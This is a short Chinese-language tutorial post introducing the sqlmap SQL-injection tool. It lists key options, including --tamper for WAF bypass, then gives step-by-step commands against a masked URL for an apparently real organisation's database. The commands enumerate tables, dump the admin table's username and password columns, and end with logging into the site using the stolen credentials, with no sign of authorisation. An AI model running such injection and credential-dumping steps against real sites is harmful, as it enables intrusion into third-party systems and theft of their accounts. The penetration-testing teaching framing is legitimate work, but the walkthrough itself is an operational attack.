sqlmap使用入门

sqlmap加速了sql注入的发展，需要掌握6点，其一是--dbs获得数据库名称，其二是-D 数据库名称 --tables 获得数据库中的所有表名，其三是-D 数据库名 -T 表名 -C 字段1,字段2 --dump 获得数据库中的表中的字段的值，其四是-r POST请求.txt针对POST请求进行sql注入，其五是已知数据库用--dbms MYSQL进行漏洞探测，其六是使用--tamper变形载核绕过WAF。ailx10 预祝大家：2023护网取得好成绩～

ailx10

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

sqlmap注入，获得数据库名称（--dbs）

sqlmap -u "https://****" --dbs

sqlmap注入，获得数据库中的所有表名（-D 数据库名称 --tables）

sqlmap -u "https://***" -D toaa2001_org_tw --tables

sqlmap注入，获得数据库中的表中的所有字段（-D 数据库名 -T 表名 --columns）

sqlmap -u "https://***" -D toaa2001_org_tw -T admin --columns

sqlmap注入，获得数据库中的表中的字段的值（-D 数据库名 -T 表名 -C 字段1,字段2 --dump）

sqlmap -u "https://***" -D toaa2001_org_tw -T admin -C A_Pass,A_User --dump

使用账号和密码登录网站

登录网站成功，sqlmap就是这么朴实无华，且枯燥

已开启送礼物